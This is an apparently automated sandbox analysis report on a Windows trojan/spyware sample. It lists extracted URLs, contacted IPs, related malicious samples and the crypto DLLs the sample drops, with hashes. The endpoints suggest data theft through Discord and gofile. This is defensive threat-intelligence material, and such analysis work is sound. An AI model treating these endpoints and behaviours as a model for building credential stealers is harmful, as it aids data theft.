00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372881830.0000023E95FA7000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374540168.0000023E96A06000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356087969.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339726671.0000023E95FA2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359464370.0000023E96B5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://httpbin.org/post	322pVOVprx.exe, 00000001.00000003.362660689.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374277035.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E96887000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v6/users/	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1050492593114456124/1051490320921145384/786713106658492416.we	322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Ousret/charset_normalizer	322pVOVprx.exe, 00000001.00000003.348277479.0000023E967E2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E96822000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355469303.0000023E96824000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.firmaprofesional.com/cps0	322pVOVprx.exe, 00000001.00000003.356246607.0000023E96C07000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374708837.0000023E96C0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/re.html#re.sub	322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FF5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FB6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/pypa/setuptools/main/docs/images/banner-640x320.svg	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2	322pVOVprx.exe, 00000001.00000002.373788241.0000023E96540000.00000004.00001000.00020000.00000000.sdmp	false		high
http://yahoo.com/	322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356593337.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E9684D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373306892.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359522305.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular	322pVOVprx.exe, 00000001.00000003.360078794.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352292036.0000023E95FD4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347985009.0000023E95FB2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E95FAC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352559577.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345409708.0000023E95F25000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343024871.0000023E95A05000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372718665.0000023E95F2D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347147894.0000023E95F2B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350749759.0000023E95FC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344269479.0000023E95ECF000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349928799.0000023E957C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339992640.0000023E957A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	322pVOVprx.exe, 00000001.00000003.357641194.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345942222.0000023E9620B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358346646.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373318168.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://w3c.github.io/html/sec-forms.html#multipart-form-data	322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340131521.0000023E960B1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373245305.0000023E96145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/pyparsing/pyparsing/wiki	322pVOVprx.exe, 00000001.00000003.355028166.0000023E95F83000.00000004.00000020.00020000.00000000.sdmp	false		high
https://epicgames.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://youtube.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/pypa/setuptools/issues	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/badge/code%20style-black-000000.svg	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sellix.io)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.137.232	unknown	United States	13335	CLOUDFLARENETUS	false
104.237.62.211	api4.ipify.org	United States	18450	WEBNXUS	false
162.159.128.233	canary.discord.com	United States	13335	CLOUDFLARENETUS	false
64.185.227.155	unknown	United States	18450	WEBNXUS	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	false
51.38.43.18	api.gofile.io	France	16276	OVHFR	false
173.231.16.76	unknown	United States	18450	WEBNXUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	806836
Start date and time:	2023-02-14 04:49:11 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	322pVOVprx.exe
Detection:	MAL
Classification:	mal64.troj.spyw.winEXE@6/78@12/7
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.1% (good quality ratio 84.2%) Quality average: 63.6% Quality standard deviation: 34.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 43 Number of non-executed functions: 68
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 209.197.3.8
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.159.137.232	f023.exe	Get hash	malicious	Browse
	CC Checker AcTeam.exe	Get hash	malicious	Browse
	Urgent Price request P.O 1672891 And Images (ITF).exe	Get hash	malicious	Browse
	MT CHEMITEC V2302 - AGENT APPOINTMENT.exe	Get hash	malicious	Browse
	IALTNT22021-001.exe	Get hash	malicious	Browse
	Oxzy.exe	Get hash	malicious	Browse
	MV BELLIGHT DISCH ABT 46982 MTS OF SOYABEANS IN BULK FORMAL AGENCY APPOINTMENT_pdf.exe	Get hash	malicious	Browse
	Creal.exe	Get hash	malicious	Browse
	uBZeAVcb6r.exe	Get hash	malicious	Browse
	e-dekont-20230127.exe	Get hash	malicious	Browse
	E2C31090339C37FAF04CE2489EA35E9E22844B5AEF1A0.exe	Get hash	malicious	Browse
	KPCPU-231.exe	Get hash	malicious	Browse
	e-dekont-20230120-.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.777.12023.exe	Get hash	malicious	Browse
	XQDo1PTnRJ.exe	Get hash	malicious	Browse
	beF3Ek6Ual.exe	Get hash	malicious	Browse
	WA7urAQIa4.exe	Get hash	malicious	Browse
	QVtJKhCR8L.exe	Get hash	malicious	Browse
	f0pl993Jlv.exe	Get hash	malicious	Browse
	AhbLc42WlU.exe	Get hash	malicious	Browse
104.237.62.211	02-06-2023 BKKS22087405.exe	Get hash	malicious	Browse
	BTSL catalogue_2023_samples_list_revised.exe	Get hash	malicious	Browse
	Curriculum Vitae CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	Browse
	ACCOUNT_STATEMENT.exe	Get hash	malicious	Browse
	dekont-20230213.exe	Get hash	malicious	Browse
	aust.exe	Get hash	malicious	Browse
	whatsapp20231302.vbs	Get hash	malicious	Browse
	Meidoh RFQ IND.2023.exe	Get hash	malicious	Browse
	Order 45655454__GZip.exe	Get hash	malicious	Browse
	Quotation Inquiry.exe	Get hash	malicious	Browse
	SWIFT COPY $47,000.00.exe	Get hash	malicious	Browse
	Mt6zNRLiN7.exe	Get hash	malicious	Browse
	EbFCzrkHbh.exe	Get hash	malicious	Browse
	Ref SF08866198 - Copy.exe	Get hash	malicious	Browse
	Payment Advice.vbs	Get hash	malicious	Browse
	NEW INVOICE FOR OUR BULK ORDER.exe	Get hash	malicious	Browse
	Debit Note.exe	Get hash	malicious	Browse
	DHL Original Documents.exe	Get hash	malicious	Browse
	DHL Original Documents.exe	Get hash	malicious	Browse
	SOA.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
canary.discord.com	S3zoj9Uts0.exe	Get hash	malicious	Browse	162.159.138.232
	uBZeAVcb6r.exe	Get hash	malicious	Browse	162.159.137.232
	12057ad2.exe	Get hash	malicious	Browse	162.159.138.232
	build (2).exe	Get hash	malicious	Browse	162.159.136.232
	Evo_Spoofer_V2.exe	Get hash	malicious	Browse	162.159.135.232
	qgMcnt4meR.exe	Get hash	malicious	Browse	162.159.128.233
	04A31AE8A31BB4144D7392040442F4A38E8301CC55012.exe	Get hash	malicious	Browse	162.159.136.232
	vrG0FGHo9i.exe	Get hash	malicious	Browse	162.159.138.232
	DsGo26G94d.exe	Get hash	malicious	Browse	162.159.138.232
	E3yRg4ob8v.exe	Get hash	malicious	Browse	162.159.138.232
	iBRa3vP0WB.exe	Get hash	malicious	Browse	162.159.137.232
	6ZA1oFKiR8.exe	Get hash	malicious	Browse	162.159.138.232
	duEkTVseyk.exe	Get hash	malicious	Browse	162.159.128.233
	PMb1MdlBGB.exe	Get hash	malicious	Browse	162.159.128.233
	5fmulGfQ2b.exe	Get hash	malicious	Browse	162.159.137.232
	nUBTIa1WRr.exe	Get hash	malicious	Browse	162.159.137.232
	Pw4sv8JMgF.exe	Get hash	malicious	Browse	162.159.135.232
	4G6DrDxQk5.exe	Get hash	malicious	Browse	162.159.136.232
	oilQDAuiBH.exe	Get hash	malicious	Browse	162.159.128.233
	48aITmz4vp.exe	Get hash	malicious	Browse	162.159.137.232
api4.ipify.org	02-06-2023 BKKS22087405.exe	Get hash	malicious	Browse	104.237.62.211
	VCqoktVVTW.exe	Get hash	malicious	Browse	173.231.16.76
	jYUiLz3l4X.exe	Get hash	malicious	Browse	173.231.16.76
	FedEx Receipt_AWB# 102233516763.exe	Get hash	malicious	Browse	64.185.227.155
	shipping documents.exe	Get hash	malicious	Browse	64.185.227.155
	BTSL catalogue_2023_samples_list_revised.exe	Get hash	malicious	Browse	104.237.62.211
	Curriculum Vitae CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	Browse	104.237.62.211
	Produkt nov#U00e9 objedn#U00e1vky.vbe	Get hash	malicious	Browse	64.185.227.155
	TTRES2102023.exe	Get hash	malicious	Browse	173.231.16.76
	ACCOUNT_STATEMENT.exe	Get hash	malicious	Browse	104.237.62.211
	dekont-20230213.exe	Get hash	malicious	Browse	104.237.62.211
	e-dekont-20230213.exe	Get hash	malicious	Browse	64.185.227.155
	DHL ORIGINAL DOCUMENT.exe	Get hash	malicious	Browse	173.231.16.76
	aust.exe	Get hash	malicious	Browse	64.185.227.155
	PO. No. DM223778 IMG.vbs	Get hash	malicious	Browse	173.231.16.76
	130223.exe	Get hash	malicious	Browse	64.185.227.155
	whatsapp20231302.vbs	Get hash	malicious	Browse	104.237.62.211
	New Order - ZKTECO.vbs	Get hash	malicious	Browse	173.231.16.76
	T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe	Get hash	malicious	Browse	64.185.227.155
	FEDEX INVOICE.exe	Get hash	malicious	Browse	173.231.16.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WEBNXUS	02-06-2023 BKKS22087405.exe	Get hash	malicious	Browse	104.237.62.211
	VCqoktVVTW.exe	Get hash	malicious	Browse	173.231.16.76
	jYUiLz3l4X.exe	Get hash	malicious	Browse	173.231.16.76
	FedEx Receipt_AWB# 102233516763.exe	Get hash	malicious	Browse	173.231.16.76
	shipping documents.exe	Get hash	malicious	Browse	173.231.16.76
	BTSL catalogue_2023_samples_list_revised.exe	Get hash	malicious	Browse	104.237.62.211
	Curriculum Vitae CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	Browse	104.237.62.211
	Produkt nov#U00e9 objedn#U00e1vky.vbe	Get hash	malicious	Browse	64.185.227.155
	TTRES2102023.exe	Get hash	malicious	Browse	173.231.16.76
	ACCOUNT_STATEMENT.exe	Get hash	malicious	Browse	104.237.62.211
	dekont-20230213.exe	Get hash	malicious	Browse	104.237.62.211
	e-dekont-20230213.exe	Get hash	malicious	Browse	64.185.227.155
	DHL ORIGINAL DOCUMENT.exe	Get hash	malicious	Browse	173.231.16.76
	aust.exe	Get hash	malicious	Browse	64.185.227.155
	PO. No. DM223778 IMG.vbs	Get hash	malicious	Browse	173.231.16.76
	130223.exe	Get hash	malicious	Browse	64.185.227.155
	whatsapp20231302.vbs	Get hash	malicious	Browse	104.237.62.211
	New Order - ZKTECO.vbs	Get hash	malicious	Browse	173.231.16.76
	T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe	Get hash	malicious	Browse	64.185.227.155
	FEDEX INVOICE.exe	Get hash	malicious	Browse	173.231.16.76
CLOUDFLARENETUS	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	33040117281.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	https://banquea.ru	Get hash	malicious	Browse	188.114.97.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	HSBC Payment Advice.com.exe	Get hash	malicious	Browse	188.114.96.3
	Remmitance copy.shtml.html	Get hash	malicious	Browse	104.18.11.207
	https://netorgft4757675-my.sharepoint.com/:o:/g/personal/nino_vervestaffing_com/EuVkRbAPDwZFrFzhzCB__pIBBRD_SZK6hPoC3ZhgkcgmFg?e=5%3adVoGdo&at=9	Get hash	malicious	Browse	104.17.25.14
	https://aoowpeoworbnrriop.com/amazon-RD292-user-card-detail-em-thank	Get hash	malicious	Browse	104.17.25.14
	file.exe	Get hash	malicious	Browse	188.114.96.3
	qi3aGh1Sg3.exe	Get hash	malicious	Browse	188.114.97.3
	https://www.taskade.com:443/d/xJLXhpjd7Z2E8Xsq?share=view&view=dJ775zvXdngB6mXd&as=list	Get hash	malicious	Browse	104.17.25.14
	file.exe	Get hash	malicious	Browse	188.114.96.3
	file.exe	Get hash	malicious	Browse	188.114.96.3
	Ach-Copy-232323.HTM	Get hash	malicious	Browse	104.16.123.96

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pyd	reaper.exe	Get hash	malicious	Browse
	PonysGW.exe	Get hash	malicious	Browse
	blackcap.exe	Get hash	malicious	Browse
	yeet.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pyd	reaper.exe	Get hash	malicious	Browse
	PonysGW.exe	Get hash	malicious	Browse
	blackcap.exe	Get hash	malicious	Browse
	yeet.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pyd	reaper.exe	Get hash	malicious	Browse
	PonysGW.exe	Get hash	malicious	Browse
	blackcap.exe	Get hash	malicious	Browse
	yeet.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.693594490869205
Encrypted:	false
SSDEEP:	96:BZ9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDVM0OcX6gY/7ECFV:r9damqT3ThITst0E5DVKcqgY/79X
MD5:	ABA0195EB33D86216170DCFF947DEBDB
SHA1:	ACBE4DC26AD65DE51385CD95128491C64DEF9502
SHA-256:	1F588A0D71C5378987FE05224493D85E93D02A52CE0B05809A06FC2BD489C325
SHA-512:	8E4C7E02E55C7A64F81A2256A0B926A8CAD676571B6F822F7FDFDA5E4CC3EBF2A3EE45188BA2D2D639977CD4DCDBD737CA33DE7E838F3CD0B17C948AF6B65280
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: reaper.exe, Detection: malicious, Browse Filename: PonysGW.exe, Detection: malicious, Browse Filename: blackcap.exe, Detection: malicious, Browse Filename: yeet.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...ba.c.........." ..."............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.048707283691193
Encrypted:	false
SSDEEP:	192:HjNF/1nb2eqCQtkluknuz4ceS4QDuWA7cqgYvEP:D52P6luLtn4QDBmgYvEP
MD5:	5B855B3E838D9C7FAAD4BD736CF56D59
SHA1:	AD51237A6E2D1BEEFDDABFC8BD8AC0E205ED735F
SHA-256:	7D1B252ADC643DEEB896430B58CF457436152351EB7FA043B4B24736C9EDF864
SHA-512:	180207B3BD88976240ECCF39F2F174AF0D13FEEFD9B22B92363C0D947E8BD5B1523417A73D4B5AAF9252A59162E34E2F5DF76C837CBD1B458D1830F4D4C70918
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: reaper.exe, Detection: malicious, Browse Filename: PonysGW.exe, Detection: malicious, Browse Filename: blackcap.exe, Detection: malicious, Browse Filename: yeet.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+.....o+.....o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.051714127100642
Encrypted:	false
SSDEEP:	384:D22P6XTr0zXgWDbuQ0vdvZt49MgYvEMN:DN6XTragWDP9Jq
MD5:	5298CA8A45BB3ADD1A03EC4CF8A46072
SHA1:	CE7984FACB2DE472E247E4BBA042FEB406E1ABE1
SHA-256:	D70795D5B6103AC1D81794D209085C573E4554A312CCD762CC5767AC98E5965C
SHA-512:	B319464E07F3148F2079E22DB5B13CA08CCFE1986CD26A066B07147D6BF28E8B5D764C80AA22A33A5DFD7C9BC66FE39CBC4FC800E7FF6E13F0DE8856760A7242
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: reaper.exe, Detection: malicious, Browse Filename: PonysGW.exe, Detection: malicious, Browse Filename: blackcap.exe, Detection: malicious, Browse Filename: yeet.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+.....o+.....o+..o..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.....................@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.103885048328888
Encrypted:	false
SSDEEP:	96:2YoF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDml8jcX6gRth2h:MsiHfq5poUkJ97zIDmlucqgRvE
MD5:	68FD499C14CDDA49C5460E377410C30E
SHA1:	16CD9C10C564F4FB16CEEE33DA21BD4D4EB367B9
SHA-256:	48958204C0CC8412758C33FB4A970C87A83BE5A8A889959FE8831793D8102E06
SHA-512:	A9B529560ABDEF38110A2147EF3E7924EA43A75D946D95CEB745015B690811AA2509F387D7868F1C9C6BE526E2E32A764FE84C062CAD315FEEE344F38D9819F9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............h...h...h......h..i...h..i...h...i...h..m...h..l...h..k...h...`...h...h...h.......h...j...h.Rich..h.........PE..d...aa.c.........." ..."............P.....................................................`.........................................P8..p....8..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aes.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.554132422005377
Encrypted:	false
SSDEEP:	384:Wf+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuxLg4HPy:uqWB7YJlmLJ3oD/S4j990th9VxsC
MD5:	3BD3AF4C84932CD1AB5A8084040A76F6
SHA1:	FD0429540688A8B2F6812C6347946910C6E8765D
SHA-256:	437E89FD3DD47F5DEB6165F4F2A7F228CD415FB7F3D5DF5C1CB16A90044008CE
SHA-512:	01DC0DDD1859E67A3C7B6EA92121CF1DBC2B8E440F9ECC5F182CAAC576FEEA57637D8437314058BCE7DE65DD2BFF70411A667CAA042FA51F8630B641E33E9C81
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
